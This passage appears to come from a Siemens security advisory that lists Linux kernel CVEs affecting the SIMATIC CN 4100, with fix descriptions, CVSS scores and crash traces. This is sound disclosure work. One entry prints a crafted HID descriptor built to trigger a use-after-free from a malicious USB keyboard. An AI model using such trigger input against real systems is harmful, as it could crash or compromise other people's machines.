CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39817 In the Linux kernel, the following vulnerability has been resolved: efivarfs: Fix slab-out-of-bounds in efivarfs_d_compare Observed on kernel 6.6 (present on master as well): BUG: KASAN: slab-out-of-bounds in memcmp+0x98/0xd0 Call trace: kasan_check_range+0xe8/0x190 __asan_loadN+0x1c/0x28 memcmp+0x98/0xd0 efivarfs_d_compare+0x68/0xd8 __d_lookup_rcu_op_compare+0x178/0x218 __d_lookup_rcu+0x1f8/0x228 d_alloc_parallel+0x150/0x648 lookup_open.isra.0+0x5f0/0x8d0 open_last_lookups+0x264/0x828 path_openat+0x130/0x3f8 do_filp_open+0x114/0x248 do_sys_openat2+0x340/0x3c0 __arm64_sys_openat+0x120/0x1a0 If dentry->d_name.len < EFI_VARIABLE_GUID_LEN , 'guid' can become negative, leadings to oob. The issue can be triggered by parallel lookups using invalid filename: T1 T2 lookup_open ->lookup simple_lookup d_add // invalid dentry is added to hash list lookup_open d_alloc_parallel __d_lookup_rcu __d_lookup_rcu_op_compare hlist_bl_for_each_entry_rcu // invalid dentry can be retrieved ->d_compare efivarfs_d_compare // oob Fix it by checking 'guid' before cmp. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39819 In the Linux kernel, the following vulnerability has been resolved: fs/smb: Fix inconsistent refcnt update A possible inconsistent update of refcount was identified in `smb2_compound_op`. Such inconsistent update could lead to possible resource leaks. Why it is a possible bug: 1. In the comment section of the function, it clearly states that the reference to `cfile` should be dropped after calling this function. 2. Every control flow path would check and drop the reference to `cfile`, except the patched one. 3. Existing callers would not handle refcount update of `cfile` if -ENOMEM is returned. To fix the bug, an extra goto label "out" is added, to make sure that the cleanup logic would always be respected. As the problem is caused by the allocation failure of `vars`, the cleanup logic between label "finished" and "out" can be safely ignored. According to the definition of function `is_replayable_error`, the error code of "-ENOMEM" is not recoverable. Therefore, the replay logic also gets ignored. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39823 In the Linux kernel, the following vulnerability has been resolved: KVM: x86: use array_index_nospec with indices that come from guest min and dest_id are guest-controlled indices. Using array_index_nospec() after the bounds checks clamps these values to mitigate speculative execution side-channels. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39824 In the Linux kernel, the following vulnerability has been resolved: HID: asus: fix UAF via HID_CLAIMED_INPUT validation After hid_hw_start() is called hidinput_connect() will eventually be called to set up the device with the input layer since the HID_CONNECT_DEFAULT connect mask is used. During hidinput_connect() all input and output reports are processed and corresponding hid_inputs are allocated and configured via hidinput_configure_usages(). This process involves slot tagging report fields and configuring usages by setting relevant bits in the capability bitmaps. However it is possible that the capability bitmaps are not set at all leading to the subsequent hidinput_has_been_populated() check to fail leading to the freeing of the hid_input and the underlying input device. This becomes problematic because a malicious HID device like a ASUS ROG N-Key keyboard can trigger the above scenario via a specially crafted descriptor which then leads to a user-after-free when the name of the freed input device is written to later on after hid_hw_start(). Below, report 93 intentionally utilises the HID_UP_UNDEFINED Usage Page which is skipped during usage configuration, leading to the frees. 0x05, 0x0D, // Usage Page (Digitizer) 0x09, 0x05, // Usage (Touch Pad) 0xA1, 0x01, // Collection (Application) 0x85, 0x0D, // Report ID (13) 0x06, 0x00, 0xFF, // Usage Page (Vendor Defined 0xFF00) 0x09, 0xC5, // Usage (0xC5) 0x15, 0x00, // Logical Minimum (0) 0x26, 0xFF, 0x00, // Logical Maximum (255) 0x75, 0x08, // Report Size (8) 0x95, 0x04, // Report Count (4) 0xB1, 0x02, // Feature (Data,Var,Abs) 0x85, 0x5D, // Report ID (93) 0x06, 0x00, 0x00, // Usage Page (Undefined) 0x09, 0x01, // Usage (0x01) 0x15, 0x00, // Logical Minimum (0) 0x26, 0xFF, 0x00, // Logical Maximum (255) 0x75, 0x08, // Report Size (8) 0x95, 0x1B, // Report Count (27) 0x81, 0x02, // Input (Data,Var,Abs) 0xC0, // End Collection Below is the KASAN splat after triggering the UAF: [ 21.672709] ================================================================== [ 21.673700] BUG: KASAN: slab-use-after-free in asus_probe+0xeeb/0xf80 [ 21.673700] Write of size 8 at addr ffff88810a0ac000 by task kworker/1:2/54 [ 21.673700] [ 21.673700] CPU: 1 UID: 0 PID: 54 Comm: kworker/1:2 Not tainted 6.16.0-rc4-g9773391cf4dd-dirty #36 PREEMPT(voluntary) [ 21.673700] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 [ 21.673700] Call Trace: [ 21.673700] [ 21.673700] dump_stack_lvl+0x5f/0x80 [ 21.673700] print_report+0xd1/0x660 [ 21.673700] kasan_report+0xe5/0x120 [ 21.673700] __asan_report_store8_noabort+0x1b/0x30 [ 21.673700] asus_probe+0xeeb/0xf80 [ 21.673700] hid_device_probe+0x2ee/0x700 [ 21.673700] really_probe+0x1c6/0x6b0 [ 21.673700] __driver_probe_device+0x24f/0x310 [ 21.673700] driver_probe_device+0x4e/0x220 [...] [ 21.673700] [ 21.673700] Allocated by task 54: [ 21.673700] kasan_save_stack+0x3d/0x60 [ 21.673700] kasan_save_track+0x18/0x40 [ 21.673700] kasan_save_alloc_info+0x3b/0x50 [ 21.673700] __kasan_kmalloc+0x9c/0xa0 [ 21.673700] __kmalloc_cache_noprof+0x139/0x340 [ 21.673700] input_allocate_device+0x44/0x370 [ 21.673700] hidinput_connect+0xcb6/0x2630 [ 21.673700] hid_connect+0xf74/0x1d60 [ 21.673700] hid_hw_start+0x8c/0x110 [ 21.673700] asus_probe+0x5a3/0xf80 [ 21.673700] hid_device_probe+0x2ee/0x700 [ 21.673700] really_probe+0x1c6/0x6b0 [ 21.673700] __driver_probe_device+0x24f/0x310 [ 21.673700] driver_probe_device+0x4e/0x220 [...] [ 21.673700] [ 21.673700] Freed by task 54: [ 21.673700] kasan_save_stack+0x3d/0x60 [ 21.673700] kasan_save_track+0x18/0x40 [ 21.673700] kasan_save_free_info+0x3f/0x60 [ 21.673700] __kasan_slab_free+0x3c/0x50 [ 21.673700] kfre ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39825 In the Linux kernel, the following vulnerability has been resolved: smb: client: fix race with concurrent opens in rename(2) Besides sending the rename request to the server, the rename process also involves closing any deferred close, waiting for outstanding I/O to complete as well as marking all existing open handles as deleted to prevent them from deferring closes, which increases the race window for potential concurrent opens on the target file. Fix this by unhashing the dentry in advance to prevent any concurrent opens on the target. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39826 In the Linux kernel, the following vulnerability has been resolved: net: rose: convert 'use' field to refcount_t The 'use' field in struct rose_neigh is used as a reference counter but lacks atomicity. This can lead to race conditions where a rose_neigh structure is freed while still being referenced by other code paths. For example, when rose_neigh->use becomes zero during an ioctl operation via rose_rt_ioctl(), the structure may be removed while its timer is still active, potentially causing use-after-free issues. This patch changes the type of 'use' from unsigned short to refcount_t and updates all code paths to use rose_neigh_hold() and rose_neigh_put() which operate reference counts atomically. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39827 In the Linux kernel, the following vulnerability has been resolved: net: rose: include node references in rose_neigh refcount Current implementation maintains two separate reference counting mechanisms: the 'count' field in struct rose_neigh tracks references from rose_node structures, while the 'use' field (now refcount_t) tracks references from rose_sock. This patch merges these two reference counting systems using 'use' field for proper reference management. Specifically, this patch adds incrementing and decrementing of rose_neigh->use when rose_neigh->count is incremented or decremented. This patch also modifies rose_rt_free(), rose_rt_device_down() and rose_clear_route() to properly release references to rose_neigh objects before freeing a rose_node through rose_remove_node(). These changes ensure rose_neigh structures are properly freed only when all references, including those from rose_node structures, are released. As a result, this resolves a slab-use-after-free issue reported by Syzbot. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39828 In the Linux kernel, the following vulnerability has been resolved: atm: atmtcp: Prevent arbitrary write in atmtcp_recv_control(). syzbot reported the splat below. [0] When atmtcp_v_open() or atmtcp_v_close() is called via connect() or close(), atmtcp_send_control() is called to send an in-kernel special message. The message has ATMTCP_HDR_MAGIC in atmtcp_control.hdr.length. Also, a pointer of struct atm_vcc is set to atmtcp_control.vcc. The notable thing is struct atmtcp_control is uAPI but has a space for an in-kernel pointer. struct atmtcp_control { struct atmtcp_hdr hdr; /* must be first */ ... atm_kptr_t vcc; /* both directions */ ... } __ATM_API_ALIGN; typedef struct { unsigned char _[8]; } __ATM_API_ALIGN atm_kptr_t; The special message is processed in atmtcp_recv_control() called from atmtcp_c_send(). atmtcp_c_send() is vcc->dev->ops->send() and called from 2 paths: 1. .ndo_start_xmit() (vcc->send() == atm_send_aal0()) 2. vcc_sendmsg() The problem is sendmsg() does not validate the message length and userspace can abuse atmtcp_recv_control() to overwrite any kptr by atmtcp_control. Let's add a new ->pre_send() hook to validate messages from sendmsg(). [0]: Oops: general protection fault, probably for non-canonical address 0xdffffc00200000ab: 0000 [#1] SMP KASAN PTI KASAN: probably user-memory-access in range [0x0000000100000558-0x000000010000055f] CPU: 0 UID: 0 PID: 5865 Comm: syz-executor331 Not tainted 6.17.0-rc1-syzkaller-00215-gbab3ce404553 #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025 RIP: 0010:atmtcp_recv_control drivers/atm/atmtcp.c:93 [inline] RIP: 0010:atmtcp_c_send+0x1da/0x950 drivers/atm/atmtcp.c:297 Code: 4d 8d 75 1a 4c 89 f0 48 c1 e8 03 42 0f b6 04 20 84 c0 0f 85 15 06 00 00 41 0f b7 1e 4d 8d b7 60 05 00 00 4c 89 f0 48 c1 e8 03 0f b6 04 20 84 c0 0f 85 13 06 00 00 66 41 89 1e 4d 8d 75 1c 4c RSP: 0018:ffffc90003f5f810 EFLAGS: 00010203 RAX: 00000000200000ab RBX: 0000000000000000 RCX: 0000000000000000 RDX: ffff88802a510000 RSI: 00000000ffffffff RDI: ffff888030a6068c RBP: ffff88802699fb40 R08: ffff888030a606eb R09: 1ffff1100614c0dd R10: dffffc0000000000 R11: ffffffff8718fc40 R12: dffffc0000000000 R13: ffff888030a60680 R14: 000000010000055f R15: 00000000ffffffff FS: 00007f8d7e9236c0(0000) GS:ffff888125c1c000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000000045ad50 CR3: 0000000075bde000 CR4: 00000000003526f0 Call Trace: vcc_sendmsg+0xa10/0xc60 net/atm/common.c:645 sock_sendmsg_nosec net/socket.c:714 [inline] __sock_sendmsg+0x219/0x270 net/socket.c:729 ____sys_sendmsg+0x505/0x830 net/socket.c:2614 ___sys_sendmsg+0x21f/0x2a0 net/socket.c:2668 __sys_sendmsg net/socket.c:2700 [inline] __do_sys_sendmsg net/socket.c:2705 [inline] __se_sys_sendmsg net/socket.c:2703 [inline] __x64_sys_sendmsg+0x19b/0x260 net/socket.c:2703 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f8d7e96a4a9 Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 51 18 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f8d7e923198 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007f8d7e9f4308 RCX: 00007f8d7e96a4a9 RDX: 0000000000000000 RSI: 0000200000000240 RDI: 0000000000000005 RBP: 00007f8d7e9f4300 R08: 65732f636f72702f R09: 65732f636f72702f R10: 65732f636f72702f R11: 0000000000000246 R12: 00007f8d7e9c10ac R13: 00007f8d7e9231a0 R14: 0000200000000200 R15: 0000200000000250 Modules linked in: View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39835 In the Linux kernel, the following vulnerability has been resolved: xfs: do not propagate ENODATA disk errors into xattr code ENODATA (aka ENOATTR) has a very specific meaning in the xfs xattr code; namely, that the requested attribute name could not be found. However, a medium error from disk may also return ENODATA. At best, this medium error may escape to userspace as "attribute not found" when in fact it's an IO (disk) error. At worst, we may oops in xfs_attr_leaf_get() when we do: error = xfs_attr_leaf_hasname(args, &bp); if (error == -ENOATTR) { xfs_trans_brelse(args->trans, bp); return error; } because an ENODATA/ENOATTR error from disk leaves us with a null bp, and the xfs_trans_brelse will then null-deref it. As discussed on the list, we really need to modify the lower level IO functions to trap all disk errors and ensure that we don't let unique errors like this leak up into higher xfs functions - many like this should be remapped to EIO. However, this patch directly addresses a reported bug in the xattr code, and should be safe to backport to stable kernels. A larger-scope patch to handle more unique errors at lower levels can follow later. (Note, prior to 07120f1abdff we did not oops, but we did return the wrong error code to userspace.) View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39838 In the Linux kernel, the following vulnerability has been resolved: cifs: prevent NULL pointer dereference in UTF16 conversion There can be a NULL pointer dereference bug here. NULL is passed to __cifs_sfu_make_node without checks, which passes it unchecked to cifs_strndup_to_utf16, which in turn passes it to cifs_local_to_utf16_bytes where '*from' is dereferenced, causing a crash. This patch adds a check for NULL 'src' in cifs_strndup_to_utf16 and returns NULL early to prevent dereferencing NULL pointer. Found by Linux Verification Center (linuxtesting.org) with SVACE View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39839 In the Linux kernel, the following vulnerability has been resolved: batman-adv: fix OOB read/write in network-coding decode batadv_nc_skb_decode_packet() trusts coded_len and checks only against skb->len. XOR starts at sizeof(struct batadv_unicast_packet), reducing payload headroom, and the source skb length is not verified, allowing an out-of-bounds read and a small out-of-bounds write. Validate that coded_len fits within the payload area of both destination and source sk_buffs before XORing. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39841 In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Fix buffer free/clear order in deferred receive path Fix a use-after-free window by correcting the buffer release sequence in the deferred receive path. The code freed the RQ buffer first and only then cleared the context pointer under the lock. Concurrent paths (e.g., ABTS and the repost path) also inspect and release the same pointer under the lock, so the old order could lead to double-free/UAF. Note that the repost path already uses the correct pattern: detach the pointer under the lock, then free it after dropping the lock. The deferred path should do the same. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39842 In the Linux kernel, the following vulnerability has been resolved: ocfs2: prevent release journal inode after journal shutdown Before calling ocfs2_delete_osb(), ocfs2_journal_shutdown() has already been executed in ocfs2_dismount_volume(), so osb->journal must be NULL. Therefore, the following calltrace will inevitably fail when it reaches jbd2_journal_release_jbd_inode(). ocfs2_dismount_volume()-> ocfs2_delete_osb()-> ocfs2_free_slot_info()-> __ocfs2_free_slot_info()-> evict()-> ocfs2_evict_inode()-> ocfs2_clear_inode()-> jbd2_journal_release_jbd_inode(osb->journal->j_journal, Adding osb->journal checks will prevent null-ptr-deref during the above execution path. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39843 In the Linux kernel, the following vulnerability has been resolved: mm: slub: avoid wake up kswapd in set_track_prepare set_track_prepare() can incur lock recursion. The issue is that it is called from hrtimer_start_range_ns holding the per_cpu(hrtimer_bases)[n].lock, but when enabled CONFIG_DEBUG_OBJECTS_TIMERS, may wake up kswapd in set_track_prepare, and try to hold the per_cpu(hrtimer_bases)[n].lock. Avoid deadlock caused by implicitly waking up kswapd by passing in allocation flags, which do not contain __GFP_KSWAPD_RECLAIM in the debug_objects_fill_pool() case. Inside stack depot they are processed by gfp_nested_mask(). Since ___slab_alloc() has preemption disabled, we mask out __GFP_DIRECT_RECLAIM from the flags there. The oops looks something like: BUG: spinlock recursion on CPU#3, swapper/3/0 lock: 0xffffff8a4bf29c80, .magic: dead4ead, .owner: swapper/3/0, .owner_cpu: 3 Hardware name: Qualcomm Technologies, Inc. Popsicle based on SM8850 (DT) Call trace: spin_bug+0x0 _raw_spin_lock_irqsave+0x80 hrtimer_try_to_cancel+0x94 task_contending+0x10c enqueue_dl_entity+0x2a4 dl_server_start+0x74 enqueue_task_fair+0x568 enqueue_task+0xac do_activate_task+0x14c ttwu_do_activate+0xcc try_to_wake_up+0x6c8 default_wake_function+0x20 autoremove_wake_function+0x1c __wake_up+0xac wakeup_kswapd+0x19c wake_all_kswapds+0x78 __alloc_pages_slowpath+0x1ac __alloc_pages_noprof+0x298 stack_depot_save_flags+0x6b0 stack_depot_save+0x14 set_track_prepare+0x5c ___slab_alloc+0xccc __kmalloc_cache_noprof+0x470 __set_page_owner+0x2bc post_alloc_hook[jt]+0x1b8 prep_new_page+0x28 get_page_from_freelist+0x1edc __alloc_pages_noprof+0x13c alloc_slab_page+0x244 allocate_slab+0x7c ___slab_alloc+0x8e8 kmem_cache_alloc_noprof+0x450 debug_objects_fill_pool+0x22c debug_object_activate+0x40 enqueue_hrtimer[jt]+0xdc hrtimer_start_range_ns+0x5f8 ... View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39844 In the Linux kernel, the following vulnerability has been resolved: mm: move page table sync declarations to linux/pgtable.h During our internal testing, we started observing intermittent boot failures when the machine uses 4-level paging and has a large amount of persistent memory: BUG: unable to handle page fault for address: ffffe70000000034 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 0 P4D 0 Oops: 0002 [#1] SMP NOPTI RIP: 0010:__init_single_page+0x9/0x6d Call Trace: __init_zone_device_page+0x17/0x5d memmap_init_zone_device+0x154/0x1bb pagemap_range+0x2e0/0x40f memremap_pages+0x10b/0x2f0 devm_memremap_pages+0x1e/0x60 dev_dax_probe+0xce/0x2ec [device_dax] dax_bus_probe+0x6d/0xc9 [... snip ...] It turns out that the kernel panics while initializing vmemmap (struct page array) when the vmemmap region spans two PGD entries, because the new PGD entry is only installed in init_mm.pgd, but not in the page tables of other tasks. And looking at __populate_section_memmap(): if (vmemmap_can_optimize(altmap, pgmap)) // does not sync top level page tables r = vmemmap_populate_compound_pages(pfn, start, end, nid, pgmap); else // sync top level page tables in x86 r = vmemmap_populate(start, end, nid, altmap); In the normal path, vmemmap_populate() in arch/x86/mm/init_64.c synchronizes the top level page table (See commit 9b861528a801 ("x86-64, mem: Update all PGDs for direct mapping and vmemmap mapping changes")) so that all tasks in the system can see the new vmemmap area. However, when vmemmap_can_optimize() returns true, the optimized path skips synchronization of top-level page tables. This is because vmemmap_populate_compound_pages() is implemented in core MM code, which does not handle synchronization of the top-level page tables. Instead, the core MM has historically relied on each architecture to perform this synchronization manually. We're not the first party to encounter a crash caused by not-sync'd top level page tables: earlier this year, Gwan-gyeong Mun attempted to address the issue [1] [2] after hitting a kernel panic when x86 code accessed the vmemmap area before the corresponding top-level entries were synced. At that time, the issue was believed to be triggered only when struct page was enlarged for debugging purposes, and the patch did not get further updates. It turns out that current approach of relying on each arch to handle the page table sync manually is fragile because 1) it's easy to forget to sync the top level page table, and 2) it's also easy to overlook that the kernel should not access the vmemmap and direct mapping areas before the sync. # The solution: Make page table sync more code robust and harder to miss To address this, Dave Hansen suggested [3] [4] introducing {pgd,p4d}_populate_kernel() for updating kernel portion of the page tables and allow each architecture to explicitly perform synchronization when installing top-level entries. With this approach, we no longer need to worry about missing the sync step, reducing the risk of future regressions. The new interface reuses existing ARCH_PAGE_TABLE_SYNC_MASK, PGTBL_P*D_MODIFIED and arch_sync_kernel_mappings() facility used by vmalloc and ioremap to synchronize page tables. pgd_populate_kernel() looks like this: static inline void pgd_populate_kernel(unsigned long addr, pgd_t *pgd, p4d_t *p4d) { pgd_populate(&init_mm, pgd, p4d); if (ARCH_PAGE_TABLE_SYNC_MASK & PGTBL_PGD_MODIFIED) arch_sync_kernel_mappings(addr, addr); } It is worth noting that vmalloc() and apply_to_range() carefully synchronizes page tables by calling p*d_alloc_track() and arch_sync_kernel_mappings(), and thus they are not affected by ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39845 In the Linux kernel, the following vulnerability has been resolved: x86/mm/64: define ARCH_PAGE_TABLE_SYNC_MASK and arch_sync_kernel_mappings() Define ARCH_PAGE_TABLE_SYNC_MASK and arch_sync_kernel_mappings() to ensure page tables are properly synchronized when calling p*d_populate_kernel(). For 5-level paging, synchronization is performed via pgd_populate_kernel(). In 4-level paging, pgd_populate() is a no-op, so synchronization is instead performed at the P4D level via p4d_populate_kernel(). This fixes intermittent boot failures on systems using 4-level paging and a large amount of persistent memory: BUG: unable to handle page fault for address: ffffe70000000034 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 0 P4D 0 Oops: 0002 [#1] SMP NOPTI RIP: 0010:__init_single_page+0x9/0x6d Call Trace: __init_zone_device_page+0x17/0x5d memmap_init_zone_device+0x154/0x1bb pagemap_range+0x2e0/0x40f memremap_pages+0x10b/0x2f0 devm_memremap_pages+0x1e/0x60 dev_dax_probe+0xce/0x2ec [device_dax] dax_bus_probe+0x6d/0xc9 [... snip ...] It also fixes a crash in vmemmap_set_pmd() caused by accessing vmemmap before sync_global_pgds() [1]: BUG: unable to handle page fault for address: ffffeb3ff1200000 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 0 P4D 0 Oops: Oops: 0002 [#1] PREEMPT SMP NOPTI Tainted: [W]=WARN RIP: 0010:vmemmap_set_pmd+0xff/0x230 vmemmap_populate_hugepages+0x176/0x180 vmemmap_populate+0x34/0x80 __populate_section_memmap+0x41/0x90 sparse_add_section+0x121/0x3e0 __add_pages+0xba/0x150 add_pages+0x1d/0x70 memremap_pages+0x3dc/0x810 devm_memremap_pages+0x1c/0x60 xe_devm_add+0x8b/0x100 [xe] xe_tile_init_noalloc+0x6a/0x70 [xe] xe_device_probe+0x48c/0x740 [xe] [... snip ...] View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39846 In the Linux kernel, the following vulnerability has been resolved: pcmcia: Fix a NULL pointer dereference in __iodyn_find_io_region() In __iodyn_find_io_region(), pcmcia_make_resource() is assigned to res and used in pci_bus_alloc_resource(). There is a dereference of res in pci_bus_alloc_resource(), which could lead to a NULL pointer dereference on failure of pcmcia_make_resource(). Fix this bug by adding a check of res. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39847 In the Linux kernel, the following vulnerability has been resolved: ppp: fix memory leak in pad_compress_skb If alloc_skb() fails in pad_compress_skb(), it returns NULL without releasing the old skb. The caller does: skb = pad_compress_skb(ppp, skb); if (!skb) goto drop; drop: kfree_skb(skb); When pad_compress_skb() returns NULL, the reference to the old skb is lost and kfree_skb(skb) ends up doing nothing, leading to a memory leak. Align pad_compress_skb() semantics with realloc(): only free the old skb if allocation and compression succeed. At the call site, use the new_skb variable so the original skb is not lost when pad_compress_skb() fails. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-772 Missing Release of Resource after Effective Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39848 In the Linux kernel, the following vulnerability has been resolved: ax25: properly unshare skbs in ax25_kiss_rcv() Bernard Pidoux reported a regression apparently caused by 